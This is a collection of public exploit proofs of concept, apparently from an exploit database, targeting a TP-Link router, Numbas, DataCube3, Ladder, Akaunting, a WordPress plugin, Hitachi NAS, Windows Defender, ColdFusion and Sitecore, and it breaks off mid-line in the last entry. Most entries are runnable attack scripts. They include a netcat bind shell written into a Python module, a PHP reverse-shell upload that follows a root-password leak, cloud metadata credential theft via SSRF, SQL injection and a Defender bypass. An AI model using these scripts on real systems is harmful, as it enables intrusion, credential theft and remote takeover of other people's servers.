-
TP-Link TL-WR740N - Buffer Overflow 'DOS'
# Exploit Title: TP-Link TL-WR740N - Buffer Overflow 'DOS' # Date: 8/12/2023 # Exploit Author: Anish Feroz (ZEROXINN) # Vendor Homepage: http://www.tp-link.com # Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n # Tested on: TP-Link TL-WR740N #Description: #There exist a buffer overflow vulnerability in TP-Link TL-WR740 router that can allow an attacker to crash the web server running on the router by sending a crafted request. To bring back the http (webserver), a user must physically reboot the router. #Usage: #python3 target username password #change port, if required ------------------------------------------------POC----------------------------------------- #!/usr/bin/python import requests from requests.auth import HTTPBasicAuth import base64 def send_request(ip, username, password): auth_url = f"http://{ip}:8082" target_url = f"http://{ip}:8082/userRpm/PingIframeRpm.htm?ping_addr=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&doType=ping&isNew=new&sendNum=4&pSize=64&overTime=800&trHops=20" credentials = f"{username}:{password}" encoded_credentials = base64.b64encode(credentials.encode()).decode() headers = { "Host": f"{ip}:8082", "Authorization": f"Basic {encoded_credentials}", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": f"http://{ip}:8082/userRpm/DiagnosticRpm.htm", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close" } session = requests.Session() response = session.get(target_url, headers=headers) if response.status_code == 200: print("Server Crashed") print(response.text) 
else: print(f"Script Completed with status code {response.status_code}") ip_address = input("Enter IP address of the host: ") username = input("Enter username: ") password = input("Enter password: ") send_request(ip_address, username, password)
-
Numbas < v7.3 - Remote Code Execution
# Exploit Title: Numbas < v7.3 - Remote Code Execution # Google Dork: N/A # Date: March 7th, 2024 # Exploit Author: Matheus Boschetti # Vendor Homepage: https://www.numbas.org.uk/ # Software Link: https://github.com/numbas/Numbas # Version: 7.2 and below # Tested on: Linux # CVE: CVE-2024-27612 import sys, requests, re, argparse, subprocess, time from bs4 import BeautifulSoup s = requests.session() def getCSRF(target): url = f"http://{target}/" req = s.get(url) soup = BeautifulSoup(req.text, 'html.parser') csrfmiddlewaretoken = soup.find('input', attrs={'name': 'csrfmiddlewaretoken'})['value'] return csrfmiddlewaretoken def createTheme(target): # Format request csrfmiddlewaretoken = getCSRF(target) theme = 'ExampleTheme' boundary = '----WebKitFormBoundaryKUMXsLP31HzARUV1' data = ( f'--{boundary}\r\n' 'Content-Disposition: form-data; name="csrfmiddlewaretoken"\r\n' '\r\n' f'{csrfmiddlewaretoken}\r\n' f'--{boundary}\r\n' 'Content-Disposition: form-data; name="name"\r\n' '\r\n' f'{theme}\r\n' f'--{boundary}--\r\n' ) headers = {'Content-Type': f'multipart/form-data; boundary={boundary}', 'User-Agent': 'Mozilla/5.0', 'Accept': '*/*', 'Connection': 'close'} # Create theme and return its ID req = s.post(f"http://{target}/theme/new/", headers=headers, data=data) redir = req.url split = redir.split('/') id = split[4] print(f"\t[i] Theme created with ID {id}") return id def login(target, user, passwd): print("\n[i] Attempting to login...") csrfmiddlewaretoken = getCSRF(target) data = {'csrfmiddlewaretoken': csrfmiddlewaretoken, 'username': user, 'password': passwd, 'next': '/'} # Login login = s.post(f"http://{target}/login/", data=data, allow_redirects=True) res = login.text if("Logged in as" not in res): print("\n\n[!] 
Login failed!") sys.exit(-1) # Check if logged and fetch ID usermatch = re.search(r'Logged in as <strong>(.*?)</strong>', res) if usermatch: user = usermatch.group(1) idmatch = re.search(r'<a href="/accounts/profile/(.*?)/"><span class="glyphicon glyphicon-user">', res) if idmatch: id = idmatch.group(1) print(f"\t[+] Logged in as \"{user}\" with ID {id}") def checkVuln(url): print("[i] Checking if target is vulnerable...") # Attempt to read files themeID = createTheme(url) target = f"http://{url}/themes/{themeID}/edit_source?filename=../../../../../../../../../.." hname = s.get(f"{target}/etc/hostname") ver = s.get(f"{target}/etc/issue") hnamesoup = BeautifulSoup(hname.text, 'html.parser') versoup = BeautifulSoup(ver.text, 'html.parser') hostname = hnamesoup.find('textarea').get_text().strip() version = versoup.find('textarea').get_text().strip() if len(hostname) < 1: print("\n\n[!] Something went wrong - target might not be vulnerable.") sys.exit(-1) print(f"\n[+] Target \"{hostname}\" is vulnerable!") print(f"\t[i] Running: \"{version}\"") # Cleanup - delete theme print(f"\t\t[i] Cleanup: deleting theme {themeID}...") target = f"http://{url}/themes/{themeID}/delete" csrfmiddlewaretoken = getCSRF(url) data = {'csrfmiddlewaretoken':csrfmiddlewaretoken} s.post(target, data=data) def replaceInit(target): # Overwrite __init__.py with arbitrary code rport = '8443' payload = f"import subprocess;subprocess.Popen(['nc','-lnvp','{rport}','-e','/bin/bash'])" csrfmiddlewaretoken = getCSRF(target) filename = '../../../../numbas_editor/numbas/__init__.py' themeID = createTheme(target) data = {'csrfmiddlewaretoken': csrfmiddlewaretoken, 'source': payload, 'filename': filename} print("[i] Delivering payload...") # Retry 5 times in case something goes wrong... 
for attempt in range(5): try: s.post(f"http://{target}/themes/{themeID}/edit_source", data=data, timeout=10) except Exception as e: pass # Establish connection to bind shell time.sleep(2) print(f"\t[+] Payload delivered, establishing connection...\n") if ":" in target: split = target.split(":") ip = split[0] else: ip = str(target) subprocess.Popen(["nc", "-n", ip, rport]) while True: pass def main(): parser = argparse.ArgumentParser() if len(sys.argv) <= 1: print("\n[!] No option provided!") print("\t- check: Passively check if the target is vulnerable by attempting to read files from disk\n\t- exploit: Attempt to actively exploit the target\n") print(f"[i] Usage: python3 {sys.argv[0]} <option> --target 172.16.1.5:80 --user example --passwd qwerty") sys.exit(-1) group = parser.add_mutually_exclusive_group(required=True) group.add_argument('action', nargs='?', choices=['check', 'exploit'], help='Action to perform: check or exploit') parser.add_argument('--target', help='Target IP:PORT') parser.add_argument('--user', help='Username to authenticate') parser.add_argument('--passwd', help='Password to authenticate') args = parser.parse_args() action = args.action target = args.target user = args.user passwd = args.passwd print("\n\t\t-==[ CVE-2024-27612: Numbas Remote Code Execution (RCE) ]==-") if action == 'check': login(target, user, passwd) checkVuln(target) elif action == 'exploit': login(target, user, passwd) replaceInit(target) else: sys.exit(-1) if __name__ == "__main__": main()
-
DataCube3 v1.0 - Unrestricted file upload 'RCE'
# Exploit Title: DataCube3 v1.0 - Unrestricted file upload 'RCE' # Date: 7/28/2022 # Exploit Author: Samy Younsi - NS Labs (https://neroteam.com) # Vendor Homepage: https://www.f-logic.jp # Software Link: https://www.f-logic.jp/pdf/support/manual_product/manual_product_datacube3_ver1.0_sc.pdf # Version: Ver1.0 # Tested on: DataCube3 version 1.0 (Ubuntu) # CVE : CVE-2024-25830 + CVE-2024-25832 # Exploit chain reverse shell, information disclosure (root password leak) + unrestricted file upload from __future__ import print_function, unicode_literals from bs4 import BeautifulSoup import argparse import requests import json import urllib3 import re urllib3.disable_warnings() def banner(): dataCube3Logo = """ ▒▒▒▒▒▒████████████████████████████████████▓▓▓▓▓▓▓▓ ▒▒▒▒▒▒▒▒██ DataCube3 Ver1.0 █F-logic▓▓ ▒▒████▒▒██ ████ ████ ██▓▓▓▓▓▓▓▓ ▒▒████▒▒██ ████ ████ ██▓▓▓▓▓▓▓▓ ▒▒▒▒▒▒▒▒██ ████ ████ ██▓▓▓▓▓▓▓▓ ▒▒▒▒▒▒▒▒██ ██▓▓████▓▓ ▒▒▒▒▒▒▒▒██ ██ ██ ██▓▓████▓▓ ▒▒▒▒▒▒▒▒██ █████████████████ ██▓▓▓▓▓▓▓▓ ▒▒▒▒▒▒████████████████████████████████████▓▓▓▓▓▓ \033[1;92mSamy Younsi (Necrum Security Labs)\033[1;m \033[1;91mDataCube3 exploit chain reverse shell\033[1;m FOR EDUCATIONAL PURPOSE ONLY. """ return print('\033[1;94m{}\033[1;m'.format(dataCube3Logo)) def extractRootPwd(RHOST, RPORT, protocol): url = '{}://{}:{}/admin/config_all.php'.format(protocol, RHOST, RPORT) try: response = requests.get(url, allow_redirects=False, verify=False, timeout=20) if response.status_code != 302: print('[!] \033[1;91mError: DataCube3 web interface is not reachable. 
Make sure the specified IP is correct.\033[1;m') exit() soup = BeautifulSoup(response.content.decode('utf-8'), 'html.parser') scriptTag = str(soup.find_all('script')[12]).replace(' ', '') rawLeakedData = re.findall('configData:.*,', scriptTag)[0] jsonLeakedData = json.loads('[{}]'.format(rawLeakedData.split('configData:[')[1].split('],')[0])) adminPassword = jsonLeakedData[12]['value'] rootPassword = jsonLeakedData[14]['value'] print('[INFO] DataCube3 leaked credentials successfully extracted: admin:{} | root:{}.\n[INFO] The target must be vulnerable.'.format(adminPassword, rootPassword)) return rootPassword except: print('[ERROR] Can\'t grab the DataCube3 version...') def generateAuthCookie(RHOST, RPORT, protocol, rootPassword): print('[INFO] Generating DataCube3 auth cookie ...') url = '{}://{}:{}/admin/config_all.php'.format(protocol, RHOST, RPORT) data = { 'user_id': 'root', 'user_pw': rootPassword, 'login': '%E3%83%AD%E3%82%B0%E3%82%A4%E3%83%B3' } try: response = requests.post(url, data=data, allow_redirects=False, verify=False, timeout=20) if response.status_code != 302: print('[!] \033[1;91mError: An error occur while trying to get the auth cookie, is the root password correct?\033[1;m') exit() authCookie = response.cookies.get_dict() print('[INFO] Authentication successful! Auth Cookie: {}'.format(authCookie)) return authCookie except: print('[ERROR] Can\'t grab the auth cookie, is the root password correct?') def extractAccesstime(RHOST, RPORT, LHOST, LPORT, protocol, authCookie): print('[INFO] Extracting Accesstime ...') url = '{}://{}:{}/admin/setting_photo.php'.format(protocol, RHOST, RPORT) try: response = requests.get(url, cookies=authCookie, allow_redirects=False, verify=False, timeout=20) if response.status_code != 302: print('[!] 
\033[1;91mError: An error occur while trying to get the accesstime value.\033[1;m') exit() soup = BeautifulSoup(response.content.decode('utf-8'), 'html.parser') accessTime = soup.find('input', {'name': 'accesstime'}).get('value') print('[INFO] AccessTime value: {}'.format(accessTime)) return accessTime except: print('[ERROR] Can\'t grab the accesstime value, is the root password correct?') def injectReverseShell(RHOST, RPORT, LHOST, LPORT, protocol, authCookie, accessTime): print('[INFO] Injecting PHP reverse shell script ...') filename='rvs.php' payload = '<?php $sock=fsockopen("{}",{});$proc=proc_open("sh", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);?>'.format(LHOST, LPORT) data = '-----------------------------113389720123090127612523184396\r\nContent-Disposition: form-data; name="add"\r\n\r\nå��ç��追å�\xA0\r\n-----------------------------113389720123090127612523184396\r\nContent-Disposition: form-data; name="addPhoto"; filename="{}"\r\nContent-Type: image/jpeg\r\n\r\n{}\r\n-----------------------------113389720123090127612523184396\r\nContent-Disposition: form-data; name="accesstime"\r\n\r\n{}\r\n-----------------------------113389720123090127612523184396--\r\n'.format(filename, payload, accessTime) headers = { 'Content-Type': 'multipart/form-data; boundary=---------------------------113389720123090127612523184396' } url = '{}://{}:{}/admin/setting_photo.php'.format(protocol, RHOST, RPORT) try: response = requests.post(url, cookies=authCookie, headers=headers, data=data, allow_redirects=False, verify=False, timeout=20) if response.status_code != 302: print('[!] 
\033[1;91mError: An error occur while trying to upload the PHP reverse shell script.\033[1;m') exit() shellURL = '{}://{}:{}/images/slideshow/{}'.format(protocol, RHOST, RPORT, filename) print('[INFO] PHP reverse shell script successfully uploaded!\n[INFO] SHELL URL: {}'.format(shellURL)) return shellURL except: print('[ERROR] Can\'t upload the PHP reverse shell script, is the root password correct?') def execReverseShell(shellURL): print('[INFO] Executing reverse shell...') try: response = requests.get(shellURL, allow_redirects=False, verify=False) print('[INFO] Reverse shell successfully executed.') return except Exception as e: print('[ERROR] Reverse shell failed. Make sure the DataCube3 device can reach the host {}:{}') return False def main(): banner() args = parser.parse_args() protocol = 'https' if args.RPORT == 443 else 'http' rootPassword = extractRootPwd(args.RHOST, args.RPORT, protocol) authCookie = generateAuthCookie(args.RHOST, args.RPORT, protocol, rootPassword) accessTime = extractAccesstime(args.RHOST, args.RPORT, args.LHOST, args.LPORT, protocol, authCookie) shellURL = injectReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT, protocol, authCookie, accessTime) execReverseShell(shellURL) if __name__ == '__main__': parser = argparse.ArgumentParser(description='Script PoC that exploit an unauthenticated remote command injection on f-logic DataCube3 devices.', add_help=False) parser.add_argument('--RHOST', help='Refers to the IP of the target machine. (f-logic DataCube3 device)', type=str, required=True) parser.add_argument('--RPORT', help='Refers to the open port of the target machine. (443 by default)', type=int, required=True) parser.add_argument('--LHOST', help='Refers to the IP of your machine.', type=str, required=True) parser.add_argument('--LPORT', help='Refers to the open port of your machine.', type=int, required=True) main()
-
Ladder v0.0.21 - Server-side request forgery (SSRF)
# Exploit Title: Ladder v0.0.21 - Server-side request forgery (SSRF) # Date: 2024-01-20 # Exploit Author: @_chebuya # Software Link: https://github.com/everywall/ladder # Version: v0.0.1 - v0.0.21 # Tested on: Ubuntu 20.04.6 LTS on AWS EC2 (ami-0fd63e471b04e22d0) # CVE: CVE-2024-27620 # Description: Ladder fails to apply sufficient default restrictions on destination addresses, allowing an attacker to make GET requests to addresses that would typically not be accessible from an external context. An attacker can access private address ranges, locally listening services, and cloud instance metadata APIs import requests import json target_url = "http://127.0.0.1:8080/api/" imdsv1_url = "http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance" r = requests.get(target_url + imdsv1_url) response_json = json.loads(r.text) print(response_json["body"])
-
Akaunting < 3.1.3 - RCE
# Exploit Title: Akaunting < 3.1.3 - RCE # Date: 08/02/2024 # Exploit Author: [email protected] # Vendor Homepage: https://akaunting.com # Software Link: https://github.com/akaunting/akaunting # Version: <= 3.1.3 # Tested on: Ubuntu (22.04) # CVE : CVE-2024-22836 #!/usr/bin/python3 import sys import re import requests import argparse def get_company(): # print("[INF] Retrieving company id...") res = requests.get(target, headers=headers, cookies=cookies, allow_redirects=False) if res.status_code != 302: print("[ERR] No company id was found!") sys.exit(3) cid = res.headers['Location'].split('/')[-1] if cid == "login": print("[ERR] Invalid session cookie!") sys.exit(7) return cid def get_tokens(url): res = requests.get(url, headers=headers, cookies=cookies, allow_redirects=False) search_res = re.search(r"\"csrfToken\"\:\".*\"", res.text) if not search_res: print("[ERR] Couldn't get csrf token") sys.exit(1) data = {} data['csrf_token'] = search_res.group().split(':')[-1:][0].replace('"', '') data['session'] = res.cookies.get('akaunting_session') return data def inject_command(cmd): url = f"{target}/{company_id}/wizard/companies" tokens = get_tokens(url) headers.update({"X-Csrf-Token": tokens['csrf_token']}) data = {"_token": tokens['csrf_token'], "_method": "POST", "_prefix": "company", "locale": f"en_US && {cmd}"} res = requests.post(url, headers=headers, cookies=cookies, json=data, allow_redirects=False) if res.status_code == 200: res_data = res.json() if res_data['error']: print("[ERR] Command injection failed!") sys.exit(4) print("[INF] Command injected!") def trigger_rce(app, version = "1.0.0"): print("[INF] Executing the command...") url = f"{target}/{company_id}/apps/install" data = {"alias": app, "version": version, "path": f"apps/{app}/download"} headers.update({"Content-Type":"application/json"}) res = requests.post(url, headers=headers, cookies=cookies, json=data, allow_redirects=False) if res.status_code == 200: res_data = res.json() if res_data['error']: 
search_res = re.search(r">Exit Code\:.*<", res_data['message']) if search_res: print("[ERR] Failed to execute the command") sys.exit(6) print("[ERR] Failed to install the app! no command was executed!") sys.exit(5) print("[INF] Executed successfully!") def login(email, password): url = f"{target}/auth/login" tokens = get_tokens(url) cookies.update({ 'akaunting_session': tokens['session'] }) data = { "_token": tokens['csrf_token'], "_method": "POST", "email": email, "password": password } req = requests.post(url, headers=headers, cookies=cookies, data=data) res = req.json() if res['error']: print("[ERR] Failed to log in!") sys.exit(8) print("[INF] Logged in") cookies.update({'akaunting_session': req.cookies.get('akaunting_session')}) def main(): inject_command(args.command) trigger_rce(args.alias, args.version) if __name__=='__main__': parser = argparse.ArgumentParser() parser.add_argument("-u", "--url", help="target url") parser.add_argument("--email", help="user login email.") parser.add_argument("--password", help="user login password.") parser.add_argument("-i", "--id", type=int, help="company id (optional).") parser.add_argument("-c", "--command", help="command to execute.") parser.add_argument("-a", "--alias", help="app alias, default: paypal-standard", default="paypal-standard") parser.add_argument("-av", "--version", help="app version, default: 3.0.2", default="3.0.2") args = parser.parse_args() headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36"} cookies = {} target = args.url try: login(args.email, args.password) company_id = get_company() if not args.id else args.id main() except: sys.exit(0)
-
Hide My WP < 6.2.9 - Unauthenticated SQLi
# Exploit Title: Wordpress Plugin Hide My WP < 6.2.9 - Unauthenticated SQLi # Publication Date: 2023-01-11 # Original Researcher: Xenofon Vassilakopoulos # Exploit Author: Xenofon Vassilakopoulos # Submitter: Xenofon Vassilakopoulos # Vendor Homepage: https://wpwave.com/ # Version: Hide My WP v6.2.8 and prior # Tested on: Hide My WP v6.2.7 # Impact: Database Access # CVE: CVE-2022-4681 # CWE: CWE-89 # CVSS Score: 8.6 (high) ## Description The plugin does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection. ## Proof of Concept curl -k --location --request GET "http://localhost:10008" --header "X-Forwarded-For: 127.0.0.1'+(select*from(select(sleep(20)))a)+'"
-
Hitachi NAS (HNAS) System Management Unit (SMU) Backup & Restore < 14.8.7825.01 - IDOR
#!/usr/bin/python3 # # Title: Hitachi NAS (HNAS) System Management Unit (SMU) Backup & Restore IDOR Vulnerability # CVE: CVE-2023-5808 # Date: 2023-12-13 # Exploit Author: Arslan Masood (@arszilla) # Vendor: https://www.hitachivantara.com/ # Version: < 14.8.7825.01 # Tested On: 13.9.7021.04 import argparse from datetime import datetime from os import getcwd import requests parser = argparse.ArgumentParser( description="CVE-2023-5808 PoC", usage="./CVE-2023-5808.py --host <Hostname/FQDN/IP> --id <JSESSIONID> --sso <JSESSIONIDSSO>" ) # Create --host argument: parser.add_argument( "--host", required=True, type=str, help="Hostname/FQDN/IP Address. Provide the port, if necessary, i.e. 127.0.0.1:8443, example.com:8443" ) # Create --id argument: parser.add_argument( "--id", required=True, type=str, help="JSESSIONID cookie value" ) # Create --sso argument: parser.add_argument( "--sso", required=True, type=str, help="JSESSIONIDSSO cookie value" ) args = parser.parse_args() def download_file(hostname, jsessionid, jsessionidsso): # Set the filename: filename = f"smu_backup-{datetime.now().strftime('%Y-%m-%d_%H%M')}.zip" # Vulnerable SMU URL: smu_url = f"https://{hostname}/mgr/app/template/simple%2CBackupSmuScreen.vm/password/" # GET request cookies smu_cookies = { "JSESSIONID": jsessionid, "JSESSIONIDSSO": jsessionidsso } # GET request headers: smu_headers = { "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Dnt": "1", "Referer": f"https://{hostname}/mgr/app/action/admin.SmuBackupRestoreAction/eventsubmit_doperform/ignored", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1", "Te": "trailers", "Connection": "close" } # Send the request: with requests.get(smu_url, 
headers=smu_headers, cookies=smu_cookies, stream=True, verify=False) as file_download: with open(filename, 'wb') as backup_archive: # Write the zip file to the CWD: backup_archive.write(file_download.content) print(f"(unknown) has been downloaded to {getcwd()}") if __name__ == "__main__": download_file(args.host, args.id, args.sso)
-
Microsoft Windows Defender / Trojan.Win32/Powessere.G - Detection Mitigation Bypass
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART2.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.microsoft.com [Product] Windows Defender [Vulnerability Type] Windows Defender Detection Mitigation Bypass TrojanWin32Powessere.G [CVE Reference] N/A [Security Issue] Trojan.Win32/Powessere.G / Mitigation Bypass Part 2. Typically, Windows Defender detects and prevents TrojanWin32Powessere.G aka "POWERLIKS" type execution that leverages rundll32.exe. Attempts at execution fail and attackers will typically get an "Access is denied" error message. Back in 2022, I disclosed how that could be easily bypassed by passing an extra path traversal when referencing mshtml but since has been mitigated. However, I discovered using multi-commas "," will bypass that mitigation and successfully execute as of the time of this writing. [References] https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt [Exploit/POC] Open command prompt as Administator. C:\sec>rundll32.exe javascript:"\..\..\mshtml,RunHTMLApplication ";alert(666) Access is denied. C:\sec>rundll32.exe javascript:"\..\..\mshtml,,RunHTMLApplication ";alert(666) Multi-commas, for the Win! [Network Access] Local [Severity] High [Disclosure Timeline] February 7, 2024: Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. 
The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security-related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
-
WordPress Plugin Duplicator < 1.5.7.1 - Unauthenticated Sensitive Data Exposure to Account Takeover
# Exploit Title: WordPress Plugin Duplicator < 1.5.7.1 - Unauthenticated Sensitive Data Exposure to Account Takeover # Google Dork: inurl:("plugins/duplicator/") # Date: 2023-12-04 # Exploit Author: Dmitrii Ignatyev # Vendor Homepage: https://duplicator.com/?utm_source=duplicator_free&utm_medium=wp_org&utm_content=desc_details&utm_campaign=duplicator_free # Software Link: https://wordpress.org/plugins/duplicator/ # Version: 1.5.7.1 # Tested on: Wordpress 6.4 # CVE : CVE-2023-6114# CVE-Link : https://wpscan.com/vulnerability/5c5d41b9-1463-4a9b-862f-e9ee600ef8e1/ # CVE-Link : https://research.cleantalk.org/cve-2023-6114-duplicator-poc-exploit/A severe vulnerability has been discovered in the directory */wordpress/wp-content/backups-dup-lite/tmp/*. This flaw not only exposes extensive information about the site, including its configuration, directories, and files, but more critically, it provides unauthorized access to sensitive data within the database and all data inside. Exploiting this vulnerability poses an imminent threat, leading to potential *brute force attacks on password hashes and, subsequently, the compromise of the entire system*.* POC*: 1) It is necessary that either the administrator or auto-backup works automatically at the scheduled time 2) Exploit will send file search requests every 5 seconds 3) I attack the site with this vulnerability using an exploit Exploit sends a request to the server every 5 seconds along the path “*http://your_site/wordpress/wp-content/backups-dup-lite/tmp/ <http://your_site/wordpress/wp-content/backups-dup-lite/tmp/>”* and if it finds something in the index of, it instantly parses all the data and displays it on the screen Exploit (python3): import requests from bs4 import BeautifulSoup import re import time url = "http://127.0.0.1/wordpress/wp-content/backups-dup-lite/tmp/" processed_files = set() def get_file_names(url): response = requests.get(url) if response.status_code == 200 and len(response.text) > 0: soup = 
BeautifulSoup(response.text, 'html.parser') links = soup.find_all('a') file_names = [] for link in links: file_name = link.get('href') if file_name != "../" and not file_name.startswith("?"): file_names.append(file_name) return file_names return [] def get_file_content(url, file_name): file_url = url + file_name if re.search(r'\.zip(?:\.|$)', file_name, re.IGNORECASE): print(f"Ignoring file: {file_name}") return None file_response = requests.get(file_url) if file_response.status_code == 200: return file_response.text return None while True: file_names = get_file_names(url) if file_names: print("File names on the page:") for file_name in file_names: if file_name not in processed_files: print(file_name) file_content = get_file_content(url, file_name) if file_content is not None: print("File content:") print(file_content) processed_files.add(file_name) time.sleep(5) -- With best regards, Dmitrii Ignatyev, Penetration Tester
-
Adobe ColdFusion versions 2018,15 (and earlier) and 2021,5 and earlier - Arbitrary File Read
# Exploit Title: File Read Arbitrary Exploit for CVE-2023-26360 # Google Dork: [not] # Date: [12/28/2023] # Exploit Author: [Youssef Muhammad] # Vendor Homepage: [ https://helpx.adobe.com/coldfusion/kb/coldfusion-downloads.html] # Software Link: [ https://drive.google.com/drive/folders/17ryBnFhswxiE1sHrNByxMVPKfUnwqmp0] # Version: [Adobe ColdFusion versions 2018,15 (and earlier) and 2021,5 and earlier] # Tested on: [Windows, Linux] # CVE : [CVE-2023-26360] import sys import requests import json BANNER = """ ██████ ██ ██ ███████ ██████ ██████ ██████ ██████ ██████ ██████ ██████ ██████ ██████ ██ ██ ██ ██ ██ ██ ████ ██ ██ ██ ██ ██ ██ ██ ████ ██ ██ ██ █████ █████ █████ ██ ██ ██ █████ █████ █████ █████ ███████ █████ ███████ ██ ██ ██ ██ ██ ██ ██ ██ ████ ██ ██ ██ ██ ██ ██ ██ ██ ██ ████ ██ ██████ ████ ███████ ███████ ██████ ███████ ██████ ███████ ██████ ██████ ██████ ██████ """ RED_COLOR = "\033[91m" GREEN_COLOR = "\032[42m" RESET_COLOR = "\033[0m" def print_banner(): print(RED_COLOR + BANNER + " Developed by SecureLayer7" + RESET_COLOR) return 0 def run_exploit(host, target_file, endpoint="/CFIDE/wizards/common/utils.cfc", proxy_url=None): if not endpoint.endswith('.cfc'): endpoint += '.cfc' if target_file.endswith('.cfc'): raise ValueError('The TARGET_FILE must not point to a .cfc') targeted_file = f"a/{target_file}" json_variables = json.dumps({"_metadata": {"classname": targeted_file}, "_variables": []}) vars_get = {'method': 'test', '_cfclient': 'true'} uri = f'{host}{endpoint}' response = requests.post(uri, params=vars_get, data={'_variables': json_variables}, proxies={'http': proxy_url, 'https': proxy_url} if proxy_url else None) file_data = None splatter = '<!-- " ---></TD></TD></TD></TH></TH></TH>' if response.status_code in [404, 500] and splatter in response.text: file_data = response.text.split(splatter, 1)[0] if file_data is None: raise ValueError('Failed to read the file. 
Ensure the CFC_ENDPOINT, CFC_METHOD, and CFC_METHOD_PARAMETERS are set correctly, and that the endpoint is accessible.') print(file_data) # Save the output to a file output_file_name = 'output.txt' with open(output_file_name, 'w') as output_file: output_file.write(file_data) print(f"The output saved to {output_file_name}") if __name__ == "__main__": if not 3 <= len(sys.argv) <= 5: print("Usage: python3 script.py <host> <target_file> [endpoint] [proxy_url]") sys.exit(1) print_banner() host = sys.argv[1] target_file = sys.argv[2] endpoint = sys.argv[3] if len(sys.argv) > 3 else "/CFIDE/wizards/common/utils.cfc" proxy_url = sys.argv[4] if len(sys.argv) > 4 else None try: run_exploit(host, target_file, endpoint, proxy_url) except Exception as e: print(f"Error: {e}")
-
Sitecore - Remote Code Execution v8.2
#!/usr/bin/env python3 # # Exploit Title: Sitecore - Remote Code Execution v8.2 # Exploit Author: abhishek morla # Google Dork: N/A # Date: 2024-01-08 # Vendor Homepage: https://www.sitecore.com/ # Software Link: https://dev.sitecore.net/ # Version: 10.3 # Tested on: windows64bit / mozila firefox # CVE : CVE-2023-35813 # The vulnerability impacts all Experience Platform topologies (XM, XP, XC) from 9.0 Initial Release to 10.3 Initial Release; 8.2 is also impacted # Blog : https://medium.com/@abhishekmorla/uncovering-cve-2023-35813-retrieving-core-connection-strings-in-sitecore-5502148fce09 # Video POC : https://youtu.be/vWKl9wgdTB0 import argparse import requests from urllib.parse import quote from rich.console import Console console = Console() def initial_test(hostname): # Initial payload to test vulnerability test_payload = ''' <%@Register TagPrefix = 'x' Namespace = 'System.Runtime.Remoting.Services' Assembly = 'System.Runtime.Remoting, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089' %> <x:RemotingService runat='server' Context-Response-ContentType='TestVulnerability' /> ''' encoded_payload = quote(test_payload) url = f"https://{hostname}/sitecore_xaml.ashx/-/xaml/Sitecore.Xaml.Tutorials.Styles.Index" headers = {"Content-Type": "application/x-www-form-urlencoded"} data = "__ISEVENT=1&__SOURCE=&__PARAMETERS=ParseControl(\"{}\")".format(encoded_payload) response = requests.post(url, headers=headers, data=data, verify=False) # Check for the test string in the Content-Type of the response return 'TestVulnerability' in response.headers.get('Content-Type', '') def get_payload(choice): # Payload templates for different options payloads = { '1': "<%$ ConnectionStrings:core %>", '2': "<%$ ConnectionStrings:master %>", '3': "<%$ ConnectionStrings:web %>" } base_payload = ''' <%@Register TagPrefix = 'x' Namespace = 'System.Runtime.Remoting.Services' Assembly = 'System.Runtime.Remoting, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089' 
%> <x:RemotingService runat='server' Context-Response-ContentType='{}' /> ''' return base_payload.format(payloads.get(choice, "Invalid")) def main(hostname): if initial_test(hostname): print("Exploiting, Please wait...") console.print("[bold green]The target appears to be vulnerable. Proceed with payload selection.[/bold green]") print("Select the payload to use:") print("1: Core connection strings") print("2: Master connection strings") print("3: Web connection strings") payload_choice = input("Enter your choice (1, 2, or 3): ") payload = get_payload(payload_choice) encoded_payload = quote(payload) url = f"http://{hostname}/sitecore_xaml.ashx/-/xaml/Sitecore.Xaml.Tutorials.Styles.Index" headers = {"Content-Type": "application/x-www-form-urlencoded"} data = "__ISEVENT=1&__SOURCE=&__PARAMETERS=ParseControl(\"{}\")".format(encoded_payload) response = requests.post(url, headers=headers, data=data) if 'Content-Type' in response.headers: print("Content-Type from the response header:") print("\n") print(response.headers['Content-Type']) else: print("No 